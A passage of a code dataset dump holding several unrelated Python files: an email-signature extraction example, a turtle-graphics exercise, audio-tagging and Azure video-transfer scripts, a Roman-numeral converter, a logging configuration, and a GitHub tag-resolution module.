go any higher and is why I limited it to the\nhomepage.\n\nJohn Doe\nvia mobile\"\"\"\n\n\n\n\ntext, signature = signature.extract(message, sender='john.doe@example.com')\n# text == \"Thanks Sasha, I can't go any higher and is why I limited it to the\\nhomepage.\"\n# signature == \"John Doe\\nvia mobile\"\n\nprint(text)\nprint('########')\nprint(signature)\n\n# from talon.signature.bruteforce import extract_signature\n#\n#\n# # message = \"\"\"Wow. Awesome!\n# # --\n# # Bob Smith\"\"\"\n# message = \"\"\"Thanks Sasha, I can't go any higher and is why I limited it to the\n# homepage.\n#\n# John Doe\n# via mobile\"\"\"\n#\n# text, signature = extract_signature(message)\n# print(signature)\n# # text == \"Wow. Awesome!\"\n# # signature == \"--\\nBob Smith\"","sub_path":"extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"71299815","text":"# http://judge.mipt.ru/mipt_cs_on_python3/labs/lab1.html#o3\r\n# http://cs.mipt.ru/python/lessons/lab2.html#o3\r\n\r\n# Упражнение № 3: квадрат\r\n\r\nimport turtle\r\nimport turtle_helper\r\n\r\n\r\ndef main():\r\n wn = turtle_helper.make_window(\"lightgreen\", \"Square\")\r\n t = turtle_helper.make_turtle(\"red\", 2)\r\n size = 100\r\n\r\n for i in range(4):\r\n t.forward(size)\r\n t.left(90)\r\n\r\n\r\n wn.mainloop()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"1_turtle-1/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"176190190","text":"import re\nimport taglib\nimport dbus\nfrom sys import argv\n\n\nRE_SPLIT_PATTERN = '(?: (?=\\())|(?: (?=\\[))|(?: - )'\n\n\ndef get_labels(info):\n s = re.split('(\\W+)', info)\n for i in range(2, len(s)):\n if s[i].isdigit() or s[i].isupper():\n return ''.join(s[0:i - 1]), ''.join(s[i:])\n return '', ''\n\n\ndef method():\n tech_info = kid3.getInformation()\n file_path = kid3.getFileName()\n \n kid3.setFrame(2, 'PICTURE', '')\n kid3.setFrame(2, 'ALBUMARTIST', kid3.getFrame(2, 'ARTIST'))\n\n album_tokens = re.split(RE_SPLIT_PATTERN, kid3.getFrame(2, 'ALBUM'))\n \n index = 1\n while index < len(album_tokens) and album_tokens[index][0] != '[':\n index = index + 1\n index = index - 1\n \n if index > 1:\n disc_title = album_tokens[index - 1]\n if disc_title[0] == '(':\n disc_title = disc_title[1:-1]\n taglib.set_disc_title_frame(kid3, taglib.get_tag_type(tech_info), disc_title)\n for i in range(1, index):\n if album_tokens[i][0] != '(':\n album_tokens[i] = '(' + album_tokens[i] + ')'\n \n #album = ' '.join(album_tokens[0:index])\n original_album = album_tokens[0]\n album = original_album\n kid3.setFrame(2, 'ALBUM', album)\n kid3.setFrame(2, 'ORIGINALALBUM', original_album)\n \n if album_tokens[index][0] == '(':\n tokens2 = album_tokens[index][1:-1].split(', ')\n index2 = 0\n if tokens2[index2].isdigit():\n taglib.switch_date_frames(kid3, tokens2[index2])\n if len(tokens2) == 2:\n is_digital = True\n else:\n index2 = index2 + 1\n is_digital = False\n elif len(tokens2) == 2:\n is_digital = False\n #handle missing release date\n if not is_digital:\n labels = tokens2[index2]\n release_country = tokens2[index2 + 1]\n label, catalog_number = get_labels(labels)\n taglib.set_label_frame(kid3, label)\n taglib.set_release_country_frame(kid3, release_country)\n kid3.setFrame(2, 'CATALOGNUMBER', catalog_number)\n index = index + 1\n \n try:\n media = 
album_tokens[index][1:-1]\n if media in taglib.MEDIA_SHORT_TO_LONG:\n kid3.setFrame(2, 'MEDIA', taglib.MEDIA_SHORT_TO_LONG[media])\n except IndexError:\n kid3.setFrame(2, 'MEDIA', 'CD')\n \n #taglib.switch_date_frames(kid3, '')\n taglib.set_file_name_from_tag(kid3)\n \n return ''\n \n\nif __name__ == '__main__':\n kid3 = dbus.SessionBus().get_object('net.sourceforge.kid3', '/Kid3')\n taglib.tag_and_rename2(kid3, method, *taglib.get_args(argv))\n","sub_path":"kid3/method3.py","file_name":"method3.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"91895819","text":"#!/usr/bin/env python\n\n# Imports\nimport numpy as np\nimport requests\nfrom bs4 import BeautifulSoup\nfrom azure.storage.blob import BlobServiceClient\nimport yaml\nimport subprocess\nfrom datetime import datetime\nfrom datetime import timedelta\n\n# Constants\nrepodir = '/home/tjc/github/ooicloud/ooi-opendata/'\n\n# Get list of files on raw data server\ndef get_raw_list():\n dates = []\n for i in range(4): # scrape index files from three days ago to present\n dates.append(datetime.now() - timedelta(days=i))\n\n ext = 'mov'\n filelist = []\n\n for date in dates:\n url = 'https://rawdata.oceanobservatories.org/files/RS03ASHS/PN03B/06-CAMHDA301/%i/%02.0f/%02.0f/' % (date.year, date.month, date.day)\n response = requests.get(url)\n if response.ok:\n soup = BeautifulSoup(response.text, 'html.parser')\n filelist = filelist + [url + node.get('href') for node in soup.find_all('a') if node.get('href').endswith(ext)]\n\n return filelist\n\nraw_list = get_raw_list()\n\n# Get list of files on Azure\nwith open(repodir + 'secrets/tjcrone.yml', 'r') as stream:\n keys = yaml.safe_load(stream)\nstorage_account_url = 'https://ooiopendata.blob.core.windows.net'\nblob_service_client = BlobServiceClient(storage_account_url, credential = keys['camhd'])\ncontainer_client = blob_service_client.get_container_client('camhd')\nazure_list = [blob.name for blob in container_client.list_blobs()]\n\n\n# Filter list\ntransfer_list = []\nfor url in raw_list:\n filename = url.split('/')[-1].strip()\n if filename in azure_list:\n blob_client = blob_service_client.get_blob_client(container = 'camhd', blob = filename)\n md5_hash = blob_client.get_blob_properties()['content_settings']['content_md5']\n if not md5_hash:\n transfer_list.append(url)\n if filename not in azure_list:\n transfer_list.append(url)\n\n\n# transfer files\ncontainer = 'https://ooiopendata.blob.core.windows.net/camhd?'\nfor i, url in enumerate(transfer_list):\n filename = url.split('/')[-1].strip()\n size = int(requests.get(url, stream=True).headers['Content-length'])/1024/1024/1024\n if size > 40:\n print('Skipping %s (%f GB)' % (filename, size))\n else:\n print('Copying %s [%i/%i]' % (filename, i+1, len(transfer_list)))\n subprocess.check_output(['wget', '-q', '-O', '/mnt/opendata/%s' % filename, url])\n subprocess.check_output(['/usr/local/bin/azcopy', 'copy', '/mnt/opendata/%s' % filename, container + keys['camhd'], '--put-md5'])\n subprocess.check_output(['rm', '/mnt/opendata/%s' % filename])\n\n\n# delete files on Azure for testing\n#for file_url in files_to_transfer:\n# filename = file_url.split('/')[-1].strip()\n# print('Deleting %s' % filename)\n# blob_client = blob_service_client.get_blob_client(container = 'camhd', blob = filename)\n# 
blob_client.delete_blob()\n\n\n","sub_path":"scripts/xfer_camhd.py","file_name":"xfer_camhd.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"336514676","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Sep 29 17:06:00 2020\r\n\r\n@author: z\r\n\"\"\"\r\n\r\n\r\ndef romantoint(s):\r\n \r\n \"\"\"\r\n converts roman value to integers\r\n \"\"\"\r\n\r\n dict = {\"M\" : 1000, \"D\" : 500, \"C\" : 100, \"L\":50, \"X\":10, \"V\":5, \"I\":1}\r\n s += 'I'\r\n ans = 0\r\n i = 1\r\n\r\n while i < len(s):\r\n if dict[s[-(i+1)]] < dict[s[-i]]:\r\n ans -= dict[s[-(i+1)]]\r\n else:\r\n ans += dict[s[-(i+1)]]\r\n i += 1\r\n return ans","sub_path":"roman_to_integer.py","file_name":"roman_to_integer.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"342902148","text":"import logging.config\n\nimport structlog\nfrom structlog import configure, processors, stdlib, threadlocal\n\n\nlogging.config.dictConfig({\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'json': {\n 'format': '%(message)s',\n 'class': 'pythonjsonlogger.jsonlogger.JsonFormatter'\n }\n },\n 'handlers': {\n 'json': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'json'\n }\n },\n 'loggers': {\n '': {\n 'handlers': ['json'],\n 'level': logging.DEBUG\n }\n }\n})\n\nconfigure(\n context_class=threadlocal.wrap_dict(dict),\n logger_factory=stdlib.LoggerFactory(),\n wrapper_class=stdlib.BoundLogger,\n processors=[\n stdlib.filter_by_level,\n stdlib.add_logger_name,\n stdlib.add_log_level,\n stdlib.PositionalArgumentsFormatter(),\n processors.TimeStamper(fmt=\"iso\"),\n processors.StackInfoRenderer(),\n processors.format_exc_info,\n processors.UnicodeDecoder(),\n stdlib.render_to_log_kwargs]\n)\n\nlog = structlog.getLogger()\n","sub_path":"noodle_logging/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"351821321","text":"import json\nimport requests\nimport os\nimport re\nimport sys\nimport pygit2\nfrom parse import parse\nimport urlparse\nfrom distutils.version import LooseVersion\nimport metadata\nfrom errors import ConstraintResolutionException\nfrom errors import GithubRepositoryConnectionException\nimport shaker.libs.logger\nfrom shaker.libs.pygit2_utils import pygit2_parse_error\n\n\nconst_re = re.compile('([=><]+)\\s*(.*)')\ntag_re = re.compile('v[0-9]+\\.[0-9]+\\.[0-9]+')\n\n\ndef parse_github_url(url):\n \"\"\"\n Parse a github url og the form\n git@github.com:test_organisation/test3-formula.git==v3.0.2\n with or witgout constraint and return a\n dictionary of information about it\n\n Args:\n url(string): The github url to parse\n\n Returns:\n debug(dictionary): A dictionary of information\n about the url of the form\n {\n 'source': ,\n 'name': ,\n 'organisation': ,\n 'constraint': \n }\n \"\"\"\n github_root = \"git@github.com:\"\n shaker.libs.logger.Logger().debug(\"github::parse_github_url: \"\n \" Parsing '%s'\"\n % (url))\n constraint = ''\n result = None\n have_constraint = False\n try:\n have_constraint = url.split('.git')[1] != ''\n except IndexError as e:\n msg = (\"github::parse_github_url: Could not split url '%s', '%s'\"\n % (url, e))\n raise IndexError(msg)\n\n if have_constraint:\n result = parse(\"%s{organisation}/{name}.git{constraint}\"\n % (github_root),\n 
url)\n constraint = result['constraint']\n else:\n result = parse(\"%s{organisation}/{name}.git\"\n % (github_root),\n url)\n shaker.libs.logger.Logger().debug(\"github::parse_github_url:\"\n \"No constraint found for %s\"\n % (url))\n\n organisation = result['organisation']\n name = result['name']\n source = \"%s%s/%s.git\" % (github_root, organisation, name)\n\n info = {\n 'source': source,\n 'name': name,\n 'organisation': organisation,\n 'constraint': constraint,\n }\n return info\n\n\ndef parse_semver_tag(tag):\n \"\"\"\n Convert a tag name into a dictionary of semver compliant\n data. Formats must be of the form,\n v{major}.{minor}.{patch}(-postfix)\n eg,\n v1.2.3\n v1.2.3-prerelease_tag1\n\n Args:\n tag(string): The tag to convert\n\n Returns:\n dictionary: Dictionary of semver compliant data of form,\n { \"major: major_version,\n \"minor\": minor_version,\n \"patch\": patch_version,\n \"postfix\": (posfix-tag)\n }\n If the tag could not be parsed, the values of all keys are set to None.\n \"\"\"\n retval = {\n \"major\": None,\n \"minor\": None,\n \"patch\": None,\n \"postfix\": None,\n }\n\n # Use these regexs to determine the accetable tag type\n version_comparators = {\n 'release': 'v(\\d+).(\\d+).(\\d+)$',\n 'prerelease': 'v(\\d+).(\\d+).(\\d+)-(.+)',\n 'prerelease-compat': 'v(\\d+).(\\d+).(\\d+)(.+)',\n }\n\n # Check for a release v1.2.3\n if re.match(version_comparators[\"release\"], tag):\n parsed_results = parse('v{major:d}.{minor:d}.{patch:d}', tag)\n retval = {\n \"major\": parsed_results[\"major\"],\n \"minor\": parsed_results[\"minor\"],\n \"patch\": parsed_results[\"patch\"],\n \"postfix\": None,\n }\n # Check for a semver compliant prerelease v1.2.3-pre1\n elif re.match(version_comparators[\"prerelease\"], tag):\n parsed_results = parse('v{major:d}.{minor:d}.{patch:d}-{postfix}', tag)\n retval = {\n \"major\": parsed_results[\"major\"],\n \"minor\": parsed_results[\"minor\"],\n \"patch\": parsed_results[\"patch\"],\n \"postfix\": parsed_results[\"postfix\"],\n }\n # Check for a non-semver compliant prerelease v1.2.3pre1\n elif re.match(version_comparators[\"prerelease-compat\"], tag):\n parsed_results = re.match(version_comparators[\"prerelease-compat\"], tag).groups()\n retval = {\n \"major\": int(parsed_results[0]),\n \"minor\": int(parsed_results[1]),\n \"patch\": int(parsed_results[2]),\n \"postfix\": parsed_results[3],\n }\n # Not an acceptable versioned tag\n else:\n shaker.libs.logger.Logger().debug(\"github::parse_semver_tag: \"\n \"Failed to parse tag %s'\"\n % (tag))\n\n return retval\n\n\ndef convert_tag_to_semver(tag):\n \"\"\"\n Convert a tag name into a list of semver compliant data\n Formats must be of the form,\n v{major}.{minor}.{patch}(-postfix)\n eg,\n v1.2.3\n v1.2.3-prerelease_tag1\n\n Args:\n tag(string): The tag to convert\n\n Returns:\n list: List of semver compliant data of form,\n [major_version, minor_version, patch_version, (posfix-tag)]\n Or return an empty list if the tag could not be parsed.\n \"\"\"\n parsed_results = parse_semver_tag(tag)\n rettag = [\n parsed_results[\"major\"],\n parsed_results[\"minor\"],\n parsed_results[\"patch\"],\n parsed_results[\"postfix\"],\n ]\n\n return rettag\n\n\ndef get_valid_tags(org_name,\n formula_name,\n max_tag_count=1000):\n \"\"\"\n Get all semver compliant tags from a repository using the\n formula organisation and name\n\n Args:\n org_name(string): The organisation name of the repository\n formula_name(string): The formula name of the repository\n max_tag_count(int): Limit on amount of tags to 
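parse_semver_tag above distinguishes releases, hyphenated prereleases, and the non-compliant `v1.2.3pre1` form with three separate regexes. Under the assumption that a single optional-postfix group is acceptable, the three branches collapse into one pattern; a sketch, not a drop-in replacement for every edge case the module handles:

```python
import re

# One pattern covering the three cases above: v1.2.3, v1.2.3-rc1,
# and the non-compliant v1.2.3rc1. Groups mirror parse_semver_tag's dict.
SEMVER_TAG = re.compile(r'^v(\d+)\.(\d+)\.(\d+)(?:-?(.+))?$')

def parse_tag(tag):
    m = SEMVER_TAG.match(tag)
    if not m:
        return None
    major, minor, patch, postfix = m.groups()
    return {"major": int(major), "minor": int(minor),
            "patch": int(patch), "postfix": postfix}

assert parse_tag("v1.2.3") == {"major": 1, "minor": 2, "patch": 3, "postfix": None}
assert parse_tag("v1.2.3-rc1")["postfix"] == "rc1"
assert parse_tag("1.2.3") is None
```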
fetch\n\n Returns:\n string: The tag that is calculated to be the 'preferred' one\n list: All the tag versions found that were semver compliant\n dictionary: Data for all tags, semver compliant or not\n \"\"\"\n\n github_token = get_valid_github_token()\n if not github_token:\n msg = \"github::get_branch_data: No valid github token\"\n raise GithubRepositoryConnectionException(msg)\n\n tags_url = ('https://api.github.com/repos/%s/%s/tags?per_page=%s'\n % (org_name, formula_name, max_tag_count))\n tag_versions = []\n tags_data = {}\n tags_json = requests.get(tags_url,\n auth=(github_token, 'x-oauth-basic'))\n\n shaker.libs.logger.Logger().debug(\"github::get_valid_tags: \"\n \"Calling validate_github_access with %s \"\n % str(tags_json))\n\n # Check for successful access and any credential problems\n if validate_github_access(tags_json):\n try:\n tags_data = json.loads(tags_json.text)\n for tag in tags_data:\n raw_name = tag['name']\n\n semver_info = convert_tag_to_semver(raw_name)\n # If we have a semver valid tag, then add,\n # otherwise ignore\n if len(semver_info) > 0:\n parsed_tag_version_results = parse('v{tag}', raw_name)\n if parsed_tag_version_results:\n shaker.libs.logger.Logger().debug(\"github::get_valid_tags: \"\n \"Appending valid tag %s'\"\n % (raw_name))\n parsed_tag_version = parsed_tag_version_results[\"tag\"]\n tag_versions.append(parsed_tag_version)\n else:\n shaker.libs.logger.Logger().warning(\"github::get_valid_tags: \"\n \"Ignoring semver invalid tag %s'\"\n % (raw_name))\n\n tag_versions.sort()\n wanted_version = get_latest_tag(tag_versions,\n include_prereleases=False)\n if wanted_version:\n wanted_tag = 'v{0}'.format(wanted_version)\n else:\n wanted_tag = None\n\n except ValueError as e:\n msg = (\"github::get_valid_tags: \"\n \"Invalid json for url '%s': %s\"\n % (tags_url,\n e.message))\n raise ValueError(msg)\n else:\n wanted_tag = None\n\n shaker.libs.logger.Logger().debug(\"github::get_valid_tags: \"\n \"wanted_tag=%s, tag_versions=%s\"\n % (wanted_tag, tag_versions))\n return wanted_tag, tag_versions, tags_data\n\n\ndef get_branch_data(org_name,\n formula_name,\n branch_name):\n \"\"\"\n Get the raw data from github for a specific branch of the repo\n\n Args:\n org_name(string): The organisation name of the repository\n formula_name(string): The formula name of the repository\n branch_name(string): Name of the branch\n\n Returns:\n dictionary: Data for the specific branch or a empty in case of\n problems\n \"\"\"\n\n shaker.libs.logger.Logger().debug(\"github::get_branch_data: \"\n \"starts here: org_name %s \"\n \"formula_name %s branch_name %s\"\n % (org_name, formula_name, branch_name))\n github_token = get_valid_github_token()\n if not github_token:\n msg = \"github::get_branch_data: No valid github token\"\n raise GithubRepositoryConnectionException(msg)\n\n branch_url = ('https://api.github.com/repos/%s/%s/branches/%s'\n % (org_name, formula_name, branch_name))\n shaker.libs.logger.Logger().debug(\"github::get_branch_data: \"\n \"branch_url %s \"\n % (branch_url))\n branch_json = requests.get(branch_url,\n auth=(github_token, 'x-oauth-basic'))\n\n shaker.libs.logger.Logger().debug(\"github::get_branch_data: \"\n \"Calling validate_github_access with %s \"\n % str(branch_json))\n # Check for successful access and any credential problems\n if validate_github_access(branch_json):\n try:\n branch_data = json.loads(branch_json.text)\n except ValueError as e:\n msg = (\"github::get_branch_data: \"\n \"Invalid json for url '%s': %s\"\n % (branch_url,\n 
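get_valid_tags hits the GitHub tags endpoint with basic token auth and a large per_page. Stripped to essentials, the request looks like the sketch below; raise_for_status stands in for the module's validate_github_access, and real code would also follow Link headers when a repository has more tags than one page:

```python
import requests

def fetch_tag_names(org, repo, token, per_page=100):
    """Fetch tag names for org/repo from the GitHub API, as above but
    reduced to the bare request. Raises on HTTP errors instead of using
    this module's custom validation."""
    url = 'https://api.github.com/repos/%s/%s/tags?per_page=%s' % (org, repo, per_page)
    response = requests.get(url, auth=(token, 'x-oauth-basic'))
    response.raise_for_status()
    return [tag['name'] for tag in response.json()]

# names = fetch_tag_names('some-org', 'some-formula', os.environ['GITHUB_TOKEN'])
```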
e.message))\n raise ValueError(msg)\n else:\n branch_data = None\n\n return branch_data\n\n\ndef get_latest_tag(tag_versions,\n include_prereleases=False):\n \"\"\"\n Get the latest valid semver tag from a list of tag versions.\n Trivially we can return the very latest if we like, but this\n will skip non-release versions by default\n\n Args:\n tag_versions(list): List of tag versions, in format\n [\n \"1.2.3-prerelease1\",\n \"1.1.1\",\n \"0.8.7\"\n ]\n include_prereleases(bool): True to include prereleases\n in looking for latest semver compliant release tags,\n false to only use releases (eg, 1.2.3)\n\n Returns:\n string: tag version of the latest tag, in form \"1.2.3\"\n \"\"\"\n shaker.libs.logger.Logger().debug(\"github::get_latest_tag: \"\n \"Latest from %s\"\n % (tag_versions))\n tag_versions.sort(key=LooseVersion)\n for tag_version in reversed(tag_versions):\n is_release = is_tag_release(\"v%s\" % tag_version)\n is_prerelease = is_tag_prerelease(\"v%s\" % tag_version)\n\n if not include_prereleases:\n if is_release and not is_prerelease:\n shaker.libs.logger.Logger().debug(\"github::get_latest_tag: \"\n \"Found '%s' (excluding pre-releases)\"\n % (tag_version))\n return tag_version\n else:\n if is_release or is_prerelease:\n shaker.libs.logger.Logger().debug(\"github::get_latest_tag: \"\n \"Found '%s' (including pre-releases)\"\n % (tag_version))\n return tag_version\n\n return None\n\n\ndef is_tag_release(tag):\n \"\"\"\n Simple check for a release\n\n Args:\n tag(string): The tag in format v1.2.3\n\n Returns:\n bool: True if format is that of a release,\n false otherwise\n \"\"\"\n parsed_tag = parse_semver_tag(tag)\n valid_version_checks = (\n (parsed_tag[\"major\"] is not None) and\n (parsed_tag[\"minor\"] is not None) and\n (parsed_tag[\"patch\"] is not None)\n )\n if not valid_version_checks:\n shaker.libs.logger.Logger().debug(\"github::is_tag_release: \"\n \"%s is not release, bad version checks\" % (tag))\n return False\n if parsed_tag[\"postfix\"]:\n shaker.libs.logger.Logger().debug(\"github::is_tag_release: \"\n \"%s is not release, contains postfix\" % (tag))\n return False\n\n shaker.libs.logger.Logger().debug(\"github::is_tag_release: \"\n \"%s is release\" % (tag))\n return True\n\n\ndef is_tag_prerelease(tag):\n \"\"\"\n Simple check for a pre-release\n\n Args:\n tag(string): The tag in format v1.2.3-postfix\n\n Returns:\n bool: True if format is that of a pre-release,\n false otherwise\n \"\"\"\n parsed_tag = parse_semver_tag(tag)\n valid_version_checks = (\n (parsed_tag[\"major\"] is not None) and\n (parsed_tag[\"minor\"] is not None) and\n (parsed_tag[\"patch\"] is not None)\n )\n if valid_version_checks and parsed_tag[\"postfix\"]:\n shaker.libs.logger.Logger().debug(\"github::is_tag_prerelease: \"\n \"%s is pre-release\" % (tag))\n return True\n\n shaker.libs.logger.Logger().debug(\"github::is_tag_prerelease: \"\n \"%s is not pre-release\" % (tag))\n return False\n\n\ndef resolve_constraint_to_object(org_name, formula_name, constraint):\n \"\"\"\n For a given formula, take the constraint and compare it to\n the repositories available tags. Then try to find a tag that\n best resolves within the constraint.\n\n If we can get resolutions, return the json data object associated\n with the tag. If not, then raise a ConstraintResolutionException\n\n Args:\n org_name(string): The organisation name of the formula\n formula_name(string): The formula name\n constraint(string): The constraint to be applied, in the form\n . 
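get_latest_tag above sorts with LooseVersion and then walks backwards, skipping anything that parses as a prerelease unless asked otherwise. The same selection fits in a few lines if the postfix hyphen is used as the prerelease marker (an assumption; the module also accepts postfixes without a hyphen):

```python
from distutils.version import LooseVersion

def latest_release(versions, include_prereleases=False):
    """Pick the highest version, skipping anything with a '-' postfix
    (e.g. '1.2.3-rc1') unless prereleases are allowed. Mirrors the
    walk-backwards loop above."""
    for version in sorted(versions, key=LooseVersion, reverse=True):
        if include_prereleases or '-' not in version:
            return version
    return None

assert latest_release(['1.2.3-rc1', '1.1.1', '0.8.7']) == '1.1.1'
assert latest_release(['1.2.3-rc1', '1.1.1'], include_prereleases=True) == '1.2.3-rc1'
```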
eg, '==v1.0.1', '>=2.0.1'\n\n Returns:\n dictionary: Json data from github associated with the resolved tag\n ConstraintResolutionException: If no resolutions was possible\n \"\"\"\n shaker.libs.logger.Logger().debug(\"github::resolve_constraint_to_object: \"\n \"resolve_constraint_to_object(%s, %s, %s)\"\n % (org_name, formula_name, constraint))\n\n # do we have a constraint?\n if constraint:\n # is it a branch or a tag?\n shaker.libs.logger.Logger().debug(\"github::resolve_constraint_to_object: %s/%s: \"\n \"constraint is not empty '%s'\"\n % (org_name, formula_name, constraint))\n parsed_constraint = metadata.parse_constraint(constraint)\n shaker.libs.logger.Logger().debug(\"github::resolve_constraint_to_object: %s/%s: \"\n \"parsed_constraint '%s'\"\n % (org_name, formula_name, str(parsed_constraint)))\n # is it a branch (i.e. not a version)\n if not parsed_constraint['version']:\n branch_name = parsed_constraint['tag']\n shaker.libs.logger.Logger().debug(\"github::resolve_constraint_to_object: %s/%s: \"\n \"There is no version, assuming this is \"\n \"a branch, name: '%s'\"\n % (org_name, formula_name, branch_name))\n branch_data = get_branch_data(org_name, formula_name, branch_name)\n if not branch_data:\n raise ConstraintResolutionException(\"github::resolve_constraint_to_object: %s/%s: \"\n \"github did not return any value for \"\n \"branch '%s'\"\n % (org_name, formula_name, branch_name))\n return branch_data\n\n # carry on with version analyses\n wanted_tag, tag_versions, tags_data = get_valid_tags(org_name, formula_name)\n if not constraint or (constraint == ''):\n shaker.libs.logger.Logger().debug(\"github::resolve_constraint_to_object: %s/%s: \"\n \"No constraint specified, returning '%s'\"\n % (org_name,\n formula_name,\n wanted_tag))\n obj = None\n shaker.libs.logger.Logger().debug(\"github::resolve_constraint_to_object: %s/%s: \"\n \"type of tags_data: %s\"\n % (org_name,\n formula_name,\n type(tags_data)))\n for tag_data in tags_data:\n if tag_data[\"name\"] == wanted_tag:\n obj = tag_data\n shaker.libs.logger.Logger().debug(\"github::resolve_constraint_to_object: %s/%s: \"\n \"type of (note no s!) 
tag_data: %s\"\n % (org_name,\n formula_name,\n type(tag_data)))\n break\n shaker.libs.logger.Logger().debug(\"github::resolve_constraint_to_object: %s/%s: \"\n \"returning obj: '%s' type: %s\"\n % (org_name,\n formula_name,\n str(obj), type(obj)))\n return obj\n\n parsed_constraint = metadata.parse_constraint(constraint)\n parsed_comparator = parsed_constraint['comparator']\n parsed_tag = parsed_constraint['tag']\n parsed_version = parsed_constraint['version']\n\n # See if we can pick up a version\n if tag_versions and parsed_version:\n if parsed_comparator == '==':\n if parsed_version in tag_versions:\n shaker.libs.logger.Logger().debug(\"github::resolve_constraint_to_object: %s/%s: \"\n \"Found exact version '%s'\"\n % (org_name,\n formula_name,\n parsed_version))\n obj = None\n for tag_data in tags_data:\n if tag_data[\"name\"] == parsed_tag:\n obj = tag_data\n break\n return obj\n else:\n raise ConstraintResolutionException(\"github::resolve_constraint_to_object: %s/%s: \"\n \"Could not satisfy constraint for '%s', \"\n \" version %s not in tag list %s\"\n % (org_name,\n formula_name,\n constraint,\n parsed_constraint,\n tag_versions))\n else:\n # Get a versioned tag (eg, v1.1.0) that is most greater than,\n # or least less than\n # but also not another type of tag (eg 'fdfsdfdsfsd')\n valid_version = None\n if parsed_comparator == '>=':\n # Get latest non pre-release version\n for tag_version in reversed(tag_versions):\n if (tag_version >= parsed_version):\n if not is_tag_prerelease(tag_version):\n valid_version = tag_version\n break\n else:\n shaker.libs.logger.Logger().debug(\"github::resolve_constraint_to_object: %s/%s: \"\n \"Skipping pre-release version '%s'\"\n % (org_name,\n formula_name,\n tag_version))\n else:\n raise ConstraintResolutionException(\"github::resolve_constraint_to_object: %s/%s: \"\n \" No non-prerelease version found %s\"\n % (org_name,\n formula_name,\n constraint))\n\n elif parsed_comparator == '<=':\n valid_version = None\n for tag_version in reversed(tag_versions):\n if (tag_version <= parsed_version):\n if not is_tag_prerelease(tag_version):\n valid_version = tag_version\n break\n else:\n shaker.libs.logger.Logger().debug(\"github::resolve_constraint_to_object: %s/%s: \"\n \"Skipping pre-release version '%s'\"\n % (org_name,\n formula_name,\n tag_version))\n\n if not valid_version:\n raise ConstraintResolutionException(\"github::resolve_constraint_to_object: %s/%s: \"\n \" No non-prerelease version found '%s'\"\n % (org_name,\n formula_name,\n constraint))\n else:\n msg = (\"github::resolve_constraint_to_object: \"\n \"Unknown comparator '%s/%s%s'\" % (org_name,\n formula_name,\n parsed_comparator))\n raise ConstraintResolutionException(msg)\n\n if valid_version:\n shaker.libs.logger.Logger().debug(\"github::resolve_constraint_to_object: %s/%s: \"\n \"resolve_constraint_to_object:Found valid version '%s'\"\n % (org_name,\n formula_name,\n valid_version))\n valid_tag = 'v%s' % valid_version\n obj = None\n for tag_data in tags_data:\n if tag_data[\"name\"] == valid_tag:\n obj = tag_data\n break\n\n return obj\n else:\n raise ConstraintResolutionException(\"github::resolve_constraint_to_object: %s/%s: \"\n 'Constraint %s cannot be satisfied'\n % (org_name,\n formula_name,\n constraint))\n else:\n msg = (\"github::resolve_constraint_to_object: \"\n \"Unknown parsed constraint '%s' from '%s'\" % (parsed_constraint, constraint))\n raise ConstraintResolutionException(msg)\n raise ConstraintResolutionException(\"github::resolve_constraint_to_object: %s/%s: \"\n 
'Constraint %s cannot be satisfied' % (org_name,\n formula_name,\n constraint))\n return None\n\n\ndef get_valid_github_token(online_validation_enabled=False):\n \"\"\"\n Check for a github token environment variable. If it's not there,\n or is invalid, log a message and return None. Otherwise, return the token string\n\n Parameters:\n online_validation_enabled (bool): If True, then try out the credentials against\n the github api for success. No online validation if false\n Returns:\n github_token (string): The valid github token, None if invalid\n \"\"\"\n github_token = None\n\n # A simple check for the right environment variable\n if \"GITHUB_TOKEN\" not in os.environ:\n shaker.libs.logger.Logger().error(\"No github token found. \"\n \"Please set your GITHUB_TOKEN environment variable\")\n else:\n # Test an oauth call to the api, make sure the credentials are\n # valid and we're not locked out\n if online_validation_enabled:\n url = \"https://api.github.com\"\n response = requests.get(url,\n auth=(os.environ[\"GITHUB_TOKEN\"],\n 'x-oauth-basic'))\n\n shaker.libs.logger.Logger().debug(\"github::get_valid_github_token:\"\n \"Calling validate_github_access with %s\" % (str(response)))\n # Validate the response against expected status codes\n # Set the return value to the token if we have success\n valid_response = validate_github_access(response)\n if valid_response:\n github_token = os.environ[\"GITHUB_TOKEN\"]\n else:\n shaker.libs.logger.Logger().error(\"No valid response from github token\")\n else:\n # If we're not validating online, just accept that we have a token\n github_token = os.environ[\"GITHUB_TOKEN\"]\n\n return github_token\n\n\ndef validate_github_access(response, url=None):\n \"\"\"\n Validate the github api's response for known credential problems\n\n Checked responses are\n\n * Authenticating with invalid credentials will return 401 Unauthorized:\n\n HTTP/1.1 401 Unauthorized\n {\n \"message\": \"Bad credentials\",\n \"documentation_url\": \"https://developer.github.com/v3\"\n }\n\n * Forbidden\n HTTP/1.1 403 Forbidden\n {\n \"message\": \"Maximum number of login attempts exceeded. 
